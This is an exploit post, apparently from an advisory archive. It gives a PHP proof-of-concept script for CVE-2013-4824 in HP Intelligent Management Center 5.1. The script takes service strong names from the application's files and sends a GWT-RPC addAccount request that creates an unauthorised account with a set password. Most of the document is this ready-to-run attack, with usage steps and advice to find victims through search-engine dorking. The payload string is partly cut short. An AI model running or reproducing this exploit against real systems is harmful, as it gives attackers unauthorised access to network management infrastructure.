=============================================================================================================================================
| # Title     : HP Intelligent Management 5.1 E0201 Create a new account Vulnerability                                                      |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://buy.hpe.com/my/en/software/networking-software/intelligent-management-software/c/1009931441?selector=48             |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: Create a new account in HP Intelligent Management Center .
   
   (Related : https://packetstorm.news/files/id/180902/ Linked CVE numbers: CVE-2013-4824 ) .
	
[+] save code as poc.php.

[+] Set taget : Line 19.

[+] USage : php poc.php 

[+] PayLoad :


<?php

function sendRequest($url, $data, $headers = [])
{
    $ch = curl_init();

    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

    $response = curl_exec($ch);
    curl_close($ch);

    return $response;
}

$target = "http://victim-ip:8080"; // عدّل عنوان الهدف
$username = "msf";
$password = "p4ssw0rd";

// الخطوة 1: الحصول على strong name للخدمة
$response = sendRequest("$target/servicedesk/servicedesk/servicedesk.nocache.js", "", ["User-Agent: Mozilla/5.0"]);
preg_match("/unflattenKeylistIntoAnswers\(\['default', 'safari'\], '([0-9A-Fa-f]+)'\);/", $response, $matches);
$serviceDesk = $matches[1] ?? null;

if (!$serviceDesk) {
    die("فشل في العثور على service desk strong name\n");
}

echo "Service Desk Strong Name: $serviceDesk\n";

// الخطوة 2: الحصول على strong name لخدمة الحسابات
$response = sendRequest("$target/servicedesk/servicedesk/{$serviceDesk}.cache.html", "", ["User-Agent: Mozilla/5.0"]);
preg_match("/'accountSerivce.gwtsvc', '([0-9A-Fa-f]+)', SERIALIZER_1/", $response, $matches);
$accountService = $matches[1] ?? null;

if (!$accountService) {
    die("فشل في العثور على AccountService strong name\n");
}

echo "AccountService Strong Name: $accountService\n";

// الخطوة 3: إرسال الطلب لإنشاء الحساب
$payload = "6|0|39|http://localhost:8080/servicedesk/servicedesk/|$accountService|com.h3c.imc.eu.client.account.AccountService|addAccount|...";
$data = [
    'method' => 'POST',
    'uri'    => '/servicedesk/servicedesk/accountSerivce.gwtsvc',
    'ctype'  => 'text/x-gwt-rpc; charset=UTF-8',
    'headers' => [
        "X-GWT-Module-Base: $target/servicedesk/servicedesk/",
        "X-GWT-Permutation: $serviceDesk"
    ],
    'data' => $payload
];

$response = sendRequest("$target/servicedesk/servicedesk/accountSerivce.gwtsvc", $payload, [
    "Content-Type: text/x-gwt-rpc; charset=UTF-8",
    "X-GWT-Module-Base: $target/servicedesk/servicedesk/",
    "X-GWT-Permutation: $serviceDesk"
]);

if (strpos($response, "already exists") !== false) {
    echo "المستخدم $username موجود بالفعل.\n";
} elseif (strpos($response, "added successfully") !== false) {
    echo "تم إنشاء الحساب بنجاح: $username / $password\n";
    echo "قم بتسجيل الدخول من: $target/servicedesk/ServiceDesk.jsp\n";
} else {
    echo "فشل في إنشاء الحساب.\n";
}

?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================